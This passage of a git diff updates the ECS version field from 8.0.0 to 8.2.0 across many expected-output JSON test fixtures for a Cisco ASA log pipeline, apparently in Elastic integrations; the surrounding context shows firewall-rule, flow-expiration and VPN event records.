"client-vpn-error", @@ -386,7 +386,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -462,7 +462,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -538,7 +538,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -614,7 +614,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -662,7 +662,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -738,7 +738,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-connected", @@ -814,7 +814,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-disconnected", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json index 3582450637d..763f17b03b4 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -17,7 +17,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -95,7 +95,7 @@ "ip": "10.123.123.123" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -169,7 +169,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -238,7 +238,7 @@ "port": 57621 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -308,7 +308,7 @@ "ip": "10.123.123.123" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -363,7 +363,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -436,7 +436,7 @@ "port": 0 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -505,7 +505,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -574,7 +574,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -644,7 +644,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -731,7 +731,7 @@ "port": 8080 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json index a15d6794774..3735405a9e4 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json @@ -25,7 +25,7 @@ "ip": "67.43.156.12" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -98,7 +98,7 @@ "ip": "67.43.156.12" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -152,7 +152,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -185,7 +185,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -223,7 +223,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json index 78a05215cb2..9fb8ca37bf1 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json @@ -14,7 +14,7 @@ "port": 8256 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -96,7 +96,7 @@ "port": 1772 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -175,7 +175,7 @@ "port": 1758 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -259,7 +259,7 @@ "port": 1757 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -343,7 +343,7 @@ "port": 1755 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -427,7 +427,7 @@ "port": 1754 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -511,7 +511,7 @@ "port": 1752 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -595,7 +595,7 @@ "port": 1749 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -679,7 +679,7 @@ "port": 1750 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -763,7 +763,7 @@ "port": 1747 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -847,7 +847,7 @@ "port": 1742 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -931,7 +931,7 @@ "port": 1741 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1015,7 +1015,7 @@ "port": 1739 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1099,7 +1099,7 @@ "port": 1740 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1183,7 +1183,7 @@ "port": 1738 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1267,7 +1267,7 @@ "port": 1756 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1351,7 +1351,7 @@ "port": 1737 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1435,7 +1435,7 @@ "port": 1736 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1519,7 +1519,7 @@ "port": 1765 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1602,7 +1602,7 @@ "port": 1188 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1684,7 +1684,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1763,7 +1763,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1850,7 +1850,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1929,7 +1929,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -2011,7 +2011,7 @@ "port": 8257 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2093,7 +2093,7 @@ "port": 1773 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2171,7 +2171,7 @@ "port": 8258 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2253,7 +2253,7 @@ "port": 1774 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2336,7 +2336,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2419,7 +2419,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2498,7 +2498,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -2581,7 +2581,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -2663,7 +2663,7 @@ "port": 8259 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2745,7 +2745,7 @@ "port": 1775 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2823,7 +2823,7 @@ "port": 1189 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2905,7 +2905,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2988,7 +2988,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3067,7 +3067,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3150,7 +3150,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3232,7 +3232,7 @@ "port": 8265 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3314,7 +3314,7 @@ "port": 1452 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3397,7 +3397,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3480,7 +3480,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3559,7 +3559,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3642,7 +3642,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3724,7 +3724,7 @@ "port": 8266 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3806,7 +3806,7 @@ "port": 1453 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3885,7 +3885,7 @@ "port": 1453 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3973,7 +3973,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4052,7 +4052,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -4135,7 +4135,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -4217,7 +4217,7 @@ "port": 8267 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4299,7 +4299,7 @@ "port": 1454 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4377,7 +4377,7 @@ "port": 8268 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4459,7 +4459,7 @@ "port": 1455 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4537,7 +4537,7 @@ "port": 8269 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4619,7 +4619,7 @@ "port": 1456 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4702,7 +4702,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4781,7 +4781,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -4863,7 +4863,7 @@ "port": 8270 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4945,7 +4945,7 @@ "port": 1457 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5023,7 +5023,7 @@ "port": 8271 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5105,7 +5105,7 @@ "port": 1458 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5188,7 +5188,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5267,7 +5267,7 @@ "port": 1457 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -5350,7 +5350,7 @@ "port": 8272 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5432,7 +5432,7 @@ "port": 1459 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5511,7 +5511,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -5593,7 +5593,7 @@ "port": 8273 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5675,7 +5675,7 @@ "port": 1460 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5745,7 +5745,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5799,7 +5799,7 @@ "port": 8277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5881,7 +5881,7 @@ "port": 1385 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5951,7 +5951,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5997,7 +5997,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6043,7 +6043,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6089,7 +6089,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6135,7 +6135,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6181,7 +6181,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6236,7 +6236,7 @@ "port": 1382 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -6320,7 +6320,7 @@ "port": 1385 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -6403,7 +6403,7 @@ "port": 8278 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6485,7 +6485,7 @@ "port": 1386 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6564,7 +6564,7 @@ "port": 8277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6644,7 +6644,7 @@ "port": 8277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6724,7 +6724,7 @@ "port": 8277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6804,7 +6804,7 @@ "port": 8277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6884,7 +6884,7 @@ "port": 8277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6964,7 +6964,7 @@ "port": 8277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -7044,7 +7044,7 @@ "port": 8277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -7124,7 +7124,7 @@ "port": 8277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -7204,7 +7204,7 @@ "port": 8277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -7284,7 +7284,7 @@ "port": 8277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -7364,7 +7364,7 @@ "port": 8277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -7444,7 +7444,7 @@ "port": 8277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -7524,7 +7524,7 @@ "port": 8277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -7603,7 +7603,7 @@ "port": 8279 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -7685,7 +7685,7 @@ "port": 1275 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -7763,7 +7763,7 @@ "port": 1190 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -7845,7 +7845,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -7924,7 +7924,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -8011,7 +8011,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -8090,7 +8090,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -8172,7 +8172,7 @@ "port": 8280 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -8254,7 +8254,7 @@ "port": 1276 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -8332,7 +8332,7 @@ "port": 8281 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -8414,7 +8414,7 @@ "port": 1277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -8493,7 +8493,7 @@ "port": 1276 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -8576,7 +8576,7 @@ "port": 8282 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -8658,7 +8658,7 @@ "port": 1278 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -8737,7 +8737,7 @@ "port": 1277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -8820,7 +8820,7 @@ "port": 8283 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -8902,7 +8902,7 @@ "port": 1279 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -8981,7 +8981,7 @@ "port": 1278 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -9065,7 +9065,7 @@ "port": 1279 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -9148,7 +9148,7 @@ "port": 8284 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -9230,7 +9230,7 @@ "port": 1280 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -9309,7 +9309,7 @@ "port": 1280 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -9392,7 +9392,7 @@ "port": 8285 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -9474,7 +9474,7 @@ "port": 1281 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -9552,7 +9552,7 @@ "port": 8286 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -9634,7 +9634,7 @@ "port": 1282 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -9712,7 +9712,7 @@ "port": 8287 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -9794,7 +9794,7 @@ "port": 1283 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -9872,7 +9872,7 @@ "port": 8288 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -9954,7 +9954,7 @@ "port": 1284 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -10033,7 +10033,7 @@ "port": 1281 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -10117,7 +10117,7 @@ "port": 1282 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -10201,7 +10201,7 @@ "port": 1283 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -10284,7 +10284,7 @@ "port": 8289 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -10366,7 +10366,7 @@ "port": 1285 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -10444,7 +10444,7 @@ "port": 8290 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -10526,7 +10526,7 @@ "port": 1286 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -10605,7 +10605,7 @@ "port": 1284 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -10688,7 +10688,7 @@ "port": 8291 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -10770,7 +10770,7 @@ "port": 1287 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -10849,7 +10849,7 @@ "port": 1285 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -10933,7 +10933,7 @@ "port": 1286 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -11021,7 +11021,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -11099,7 +11099,7 @@ "port": 8292 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -11181,7 +11181,7 @@ "port": 1288 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -11260,7 +11260,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -11347,7 +11347,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -11426,7 +11426,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -11508,7 +11508,7 @@ "port": 8293 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -11590,7 +11590,7 @@ "port": 1289 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -11669,7 +11669,7 @@ "port": 1288 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -11753,7 +11753,7 @@ "port": 1287 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -11841,7 +11841,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -11920,7 +11920,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -12002,7 +12002,7 @@ "port": 8294 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -12084,7 +12084,7 @@ "port": 1290 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -12163,7 +12163,7 @@ "port": 68 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -12237,7 +12237,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -12296,7 +12296,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -12379,7 +12379,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -12458,7 +12458,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -12545,7 +12545,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -12624,7 +12624,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -12707,7 +12707,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -12794,7 +12794,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -12873,7 +12873,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -12955,7 +12955,7 @@ "port": 8295 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -13037,7 +13037,7 @@ "port": 1291 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -13120,7 +13120,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -13199,7 +13199,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -13281,7 +13281,7 @@ "port": 8296 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -13363,7 +13363,7 @@ "port": 1292 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -13441,7 +13441,7 @@ "port": 8297 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -13523,7 +13523,7 @@ "port": 1293 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -13601,7 +13601,7 @@ "port": 8298 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -13683,7 +13683,7 @@ "port": 1294 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -13762,7 +13762,7 @@ "port": 1293 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -13845,7 +13845,7 @@ "port": 8299 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -13927,7 +13927,7 @@ "port": 1295 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -14005,7 +14005,7 @@ "port": 8300 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -14087,7 +14087,7 @@ "port": 1296 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -14166,7 +14166,7 @@ "port": 1294 }, "ecs": { - "version": "8.0.0" 